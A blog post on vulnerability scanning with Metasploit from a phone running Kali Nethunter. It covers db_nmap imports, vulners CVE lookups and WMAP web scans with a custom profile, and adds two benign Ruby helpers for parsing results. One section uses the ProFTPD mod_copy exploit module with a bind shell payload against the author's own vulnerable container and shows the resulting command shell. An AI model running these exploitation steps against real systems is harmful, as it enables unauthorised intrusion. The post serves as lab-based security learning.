Vulnerability Scanning with Metasploit

In testing Kali Nethunter on my OnePlus One I have been on the hunt for tools and workflows that can run on something as lightweight as an Android phone. I also want to see how far I can get without me having to run an external server.

Vulnerability scanning using OpenVAS, Nessus, or any other dedicated scanner is definitely not something that runs well on lightweight hardware. In my experience, a dedicated vulnerability scanner is pretty resource-intensive.

Since Metasploit is already my primary tool for exploiting vulnerable software, I wanted to document some tips I’ve found for doing vulnerability scanning with Metasploit itself. I will update this post if I find more workflows.

Nmap + Metasploit:

I recently found out that you can run nmap directly from Metasploit with the db_nmap command. This is really nice because the host and service results are imported straight into Metasploit’s database.

Here’s an example db_nmap command in Metasploit:

msf6 > db_nmap -sV 192.168.1.5

Here’s the output (this host is running my vulnerable Docker container):

msf6 > db_nmap -sV 192.168.1.5
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 03:47 UTC
[*] Nmap: Nmap scan report for 192.168.1.5 (192.168.1.5)
[*] Nmap: Host is up (0.12s latency).
[*] Nmap: rDNS record for 192.168.1.5: 192.168.1.5.vultr.com
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT     STATE    SERVICE     VERSION
[*] Nmap: 21/tcp   open     ftp         ProFTPD 1.3.5
[*] Nmap: 22/tcp   open     ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 25/tcp   filtered smtp
[*] Nmap: 80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
[*] Nmap: 139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 631/tcp  open     ipp         CUPS 1.7
[*] Nmap: 6667/tcp open     irc         UnrealIRCd
[*] Nmap: Service Info: Hosts: VULN, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds

Now, Metasploit is aware of those services on that host. Check with the services command:

msf6 > services
Services
========

host          port  proto  name         state     info
----          ----  -----  ----         -----     ----
192.168.1.5  21    tcp    ftp          open      ProFTPD 1.3.5
192.168.1.5  22    tcp    ssh          open      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 Ubuntu Linux; protocol 2.0
192.168.1.5  25    tcp    smtp         filtered
192.168.1.5  80    tcp    http         open      Apache httpd 2.4.7 (Ubuntu)
192.168.1.5  139   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5  445   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5  631   tcp    ipp          open      CUPS 1.7
192.168.1.5  6667  tcp    irc          open      UnrealIRCd

db_nmap will also import vulnerabilities automatically if you use any of nmap’s vulnerability-scanning NSE scripts.

Here’s an example command:

msf6 > db_nmap -sV --script=vulners.nse 192.168.1.5

Once that command completed, I could use the vulns command to list the vulnerabilities nmap discovered, now stored in Metasploit’s database:

msf6 > vulns

Vulnerabilities
===============

Timestamp                Host          Name                             References
---------                ----          ----                             ----------
2021-08-08 03:55:55 UTC  192.168.1.5  cpe:/a:proftpd:proftpd:1.3.5     CVE-2015-3306,SAINT:950EB68D408A40399926A4CCAD3CC62E,SAINT:63FB77B9136D48259E4F0D4CDA35E957,SAINT:1B08F4664C428B180EEC9617B41D9A2C,PROFTPD_MOD_COPY,PACKETSTORM:162777,PACKETSTORM:132218,PACKETSTORM:131567,PACKETSTORM:131555,PACKETSTORM:131505,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:49908,EDB-ID:37262,EDB-ID:36803,EDB-ID:36742,1337DAY-ID-23720,1337DAY-ID-23544,SSV:61050,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-19272,CVE-2019-19271,CVE-2019-19270,CVE-2019-18217,CVE-2016-3125,CVE-2013-4359,CVE-2017-7418

<snipped>
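Both the services table and the vulns table are plain text, so they are easy to post-process outside msfconsole. The following script is an added example, not code from the original post or from Metasploit: it parses both tables and joins them per host, so each host’s open services sit next to the CVE ids and the ready-made Metasploit module references (the MSF:EXPLOIT tags) the scan attached to it. The 192.168.1.5 rows are abbreviated from the output above; the 192.168.1.9 rows and the CVE-2000-0001 reference are constructed placeholders.

```ruby
# Added example, not code from the original post or from Metasploit: parse the
# `services` and `vulns` tables msfconsole prints after a db_nmap run and join
# them per host. The 192.168.1.5 rows are abbreviated from the post's own
# output; the 192.168.1.9 rows and CVE-2000-0001 are constructed placeholders.

SERVICES_SAMPLE = <<~'TXT'
  host          port  proto  name         state     info
  ----          ----  -----  ----         -----     ----
  192.168.1.5   21    tcp    ftp          open      ProFTPD 1.3.5
  192.168.1.5   25    tcp    smtp         filtered
  192.168.1.5   80    tcp    http         open      Apache httpd 2.4.7 (Ubuntu)
  192.168.1.9   22    tcp    ssh          open      Example sshd 1.0
TXT

VULNS_SAMPLE = <<~'TXT'
  Timestamp                Host          Name                            References
  ---------                ----          ----                            ----------
  2021-08-08 03:55:55 UTC  192.168.1.5   cpe:/a:proftpd:proftpd:1.3.5    CVE-2015-3306,PACKETSTORM:131567,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:36803,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-18217,CVE-2017-7418
  2021-08-08 03:55:56 UTC  192.168.1.9   cpe:/a:example:sshd:1.0         CVE-2000-0001,EDB-ID:1
TXT

Service = Struct.new(:host, :port, :proto, :name, :state, :info)
Vuln    = Struct.new(:host, :name, :cves, :msf_modules, :other_refs)

# msfconsole tables separate columns with runs of two or more spaces and put a
# dashed underline beneath the header; everything after that line is data.
def table_rows(text, ncols)
  lines = text.lines.map(&:strip)
  sep = lines.index { |l| l.start_with?('---') }
  return [] unless sep
  lines.drop(sep + 1).reject(&:empty?).map { |l| l.split(/\s{2,}/, ncols) }
end

def parse_services(text)
  # a "filtered" row has no info column, so c[5] is simply nil
  table_rows(text, 6).map { |c| Service.new(c[0], c[1].to_i, c[2], c[3], c[4], c[5]) }
end

# "MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC" -> "exploit/unix/ftp/proftpd_modcopy_exec",
# i.e. the path you would pass to `use`.
def msf_module_path(ref)
  ref.sub(/\AMSF:/, '').downcase
end

def parse_vulns(text)
  table_rows(text, 4).map do |_timestamp, host, name, refs|
    cves, msf, other = [], [], []
    refs.to_s.split(',').each do |r|
      case r
      when /\ACVE-\d{4}-\d{4,}\z/              then cves << r
      when %r{\AMSF:(EXPLOIT|AUXILIARY|POST)/} then msf << msf_module_path(r)
      else other << r # EDB-ID, PACKETSTORM, MSF:ILITIES/... and similar
      end
    end
    Vuln.new(host, name, cves.uniq.sort, msf.uniq, other)
  end
end

# Join on host: which services are open, which CVEs were attached, and which
# findings already map to a Metasploit module (those are the ones to patch first).
def triage(services, vulns)
  services.group_by(&:host).map do |host, svcs|
    hv = vulns.select { |v| v.host == host }
    {
      host: host,
      open_services: svcs.select { |s| s.state == 'open' }
                         .map { |s| "#{s.port}/#{s.proto} #{s.info || s.name}" },
      cves: hv.flat_map(&:cves).uniq.sort,
      msf_modules: hv.flat_map(&:msf_modules).uniq
    }
  end
end

def report(services, vulns)
  triage(services, vulns).map do |t|
    out = ["#{t[:host]}: #{t[:open_services].size} open service(s), " \
           "#{t[:cves].size} CVE(s), #{t[:msf_modules].size} with a Metasploit module"]
    t[:open_services].each { |s| out << "  open   #{s}" }
    t[:cves].each          { |c| out << "  cve    #{c}" }
    t[:msf_modules].each   { |m| out << "  module #{m}" }
    out.join("\n")
  end.join("\n")
end

puts report(parse_services(SERVICES_SAMPLE), parse_vulns(VULNS_SAMPLE)) if __FILE__ == $PROGRAM_NAME
```

To use it on real output, paste the two tables from msfconsole into the heredocs (or read them from files); the parser only relies on the two-space column separator and the dashed underline, which is the same layout for every table msfconsole prints.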

In the vulns output above you can see a reference tagged MSF:EXPLOIT, which means Metasploit ships an exploit module for that vulnerability:

MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC

So let’s exploit it:

msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/bind_awk 
payload => cmd/unix/bind_awk
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run 

[*] 192.168.1.5:80 - 192.168.1.5:21 - Connected to FTP server
[*] 192.168.1.5:80 - 192.168.1.5:21 - Sending copy commands to FTP server
[*] 192.168.1.5:80 - Executing PHP payload /VlrUb.php
[*] Started bind TCP handler against 192.168.1.5:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.5:4444) at 2021-08-08 04:21:30 +0000

There we go! Shell created using the results of a vulnerability scan performed on an Android phone. Epic.

I would recommend using more of nmap’s vulnerability-scanning scripts with Metasploit’s db_nmap command. I found this article very useful on vulnerability scanning with nmap:

How to Detect CVEs Using Nmap Vulnerability Scan Scripts

Web Application Vulnerability Scans:

This was also news to me, but Metasploit has a built-in web application vulnerability scanning plugin, WMAP:

WMAP Web Scanner

The WMAP documentation, preserved in a third-party fork of the old Metasploit repo on GitHub, outlines what makes WMAP special:

https://github.com/lattera/metasploit/blob/master/documentation/wmap.txt

That document doesn’t look like it has been updated in 10 years. Per the explanation in the link above, WMAP uses the information already stored in the database to intelligently attack your target. In addition, you can create WMAP profiles to run newer or even custom Metasploit modules – this makes WMAP extensible and still relevant.

Let’s try it out.

First, load wmap and configure your target:

msf6 > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 > wmap_sites -a http://192.168.1.5
[*] Site created.
msf6 > wmap_targets -t http://192.168.1.5/drupal
msf6 > wmap_targets -l
[*] Defined targets
===============

     Id  Vhost         Host          Port  SSL    Path
     --  -----         ----          ----  ---    ----
     0   192.168.1.5  192.168.1.5  80    false  /drupal

Next, list the modules WMAP has enabled for your target (wmap_run -t shows them without launching a scan):

msf6 > wmap_run -t
[*] Testing target:
[*] 	Site: 192.168.1.5 (192.168.1.5)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:43:27 +0000
[*] Loading wmap modules...
<snipped>

Finally, run your scan:

msf6 > wmap_run -e 
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: 192.168.1.5 (192.168.1.5)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:50:06 +0000
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[+] 192.168.1.5:80 Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
<snipped>

Using Custom WMAP Profiles:

In the Metasploit GitHub repo there is a sample profile showing how you can extend WMAP to run other modules through WMAP profiles:

wmap_sample_profile.txt

Here’s the file:

# 
# WMAP 1.0 Sample Profile
# wmap_run -e /path/to/profile
#
# Just add the name of the module. Use # for comments
#
frontpage
frontpage_login
options 
version 
backup_file 
#blind_sql_query 
#brute_dirs 
copy_of_file 
dir_listing 
dir_scanner
file_same_name_dir
writable

As the comments in the file explain, you extend WMAP by adding module names to a profile. That makes WMAP really useful, since you can test newer or custom Metasploit modules against a web server.

As an easy example, you could save that sample profile as /tmp/wmap-profile and then run it with the following command in Metasploit:

msf6 > wmap_run -e /tmp/wmap-profile
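Because the sample profile is old and a profile is just a list of short module names, it is worth checking that every name still resolves to a module before handing the file to wmap_run -e. The script below is an added example, not code from the post or from Metasploit: it reads the profile format shown above (one module name per line, # starts a comment, so a commented-out name is a disabled module), resolves each active name against a module inventory, and reports names that resolve nowhere. The profile text and the inventory are constructed for this example; on a real install you would build the inventory from msfconsole’s search output or by walking the modules directory.

```ruby
# Added example, not code from the post or from Metasploit: pre-flight check
# for a WMAP profile. Profile text and module inventory below are constructed.

SAMPLE_PROFILE = <<~'PROFILE'
  #
  # WMAP 1.0 Sample Profile
  # wmap_run -e /path/to/profile
  #
  options
  backup_file
  #blind_sql_query
  dir_listing
  dir_scanner        # trailing comments are stripped too
  dir_scanner
  not_a_real_module  # constructed typo, should be reported as missing
PROFILE

# Constructed stand-in for the module tree (full module paths).
MODULE_INVENTORY = %w[
  auxiliary/scanner/http/options
  auxiliary/scanner/http/backup_file
  auxiliary/scanner/http/blind_sql_query
  auxiliary/scanner/http/dir_listing
  auxiliary/scanner/http/dir_scanner
].freeze

# Returns { active: [...], disabled: [...] } in profile order, without duplicates.
# A line like "#dir_scanner" (a bare module name behind the #) is treated as a
# disabled module; any other comment line is ignored.
def parse_wmap_profile(text)
  active, disabled = [], []
  text.each_line do |raw|
    line = raw.strip
    next if line.empty?
    if line.start_with?('#')
      name = line.delete_prefix('#').strip
      disabled << name if name.match?(/\A[a-z0-9_]+\z/)
      next
    end
    active << line.split('#', 2).first.strip
  end
  { active: active.uniq, disabled: disabled.uniq }
end

# A profile name is the last path component of a module; resolve each active
# name against the inventory and split the result into found / missing.
def resolve_profile(profile, inventory)
  by_short = inventory.group_by { |path| File.basename(path) }
  found, missing = {}, []
  profile[:active].each do |name|
    paths = by_short.fetch(name, [])
    if paths.empty?
      missing << name
    else
      found[name] = paths
    end
  end
  { found: found, missing: missing }
end

def check_profile(text, inventory = MODULE_INVENTORY)
  profile = parse_wmap_profile(text)
  resolve_profile(profile, inventory).merge(disabled: profile[:disabled])
end

if __FILE__ == $PROGRAM_NAME
  result = check_profile(SAMPLE_PROFILE)
  result[:found].each { |name, paths| puts "ok       #{name} -> #{paths.join(', ')}" }
  result[:disabled].each { |name| puts "disabled #{name}" }
  result[:missing].each  { |name| puts "MISSING  #{name}" }
end
```

If the missing list is non-empty, fix or remove those lines before running the profile; WMAP cannot run a module it cannot find, and a silently skipped entry is easy to miss in the long wmap_run output.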

As I stated earlier, this makes WMAP extensible and will probably keep it forever useful as Rapid7 continues to create and update Metasploit’s modules.

Written on August 7, 2021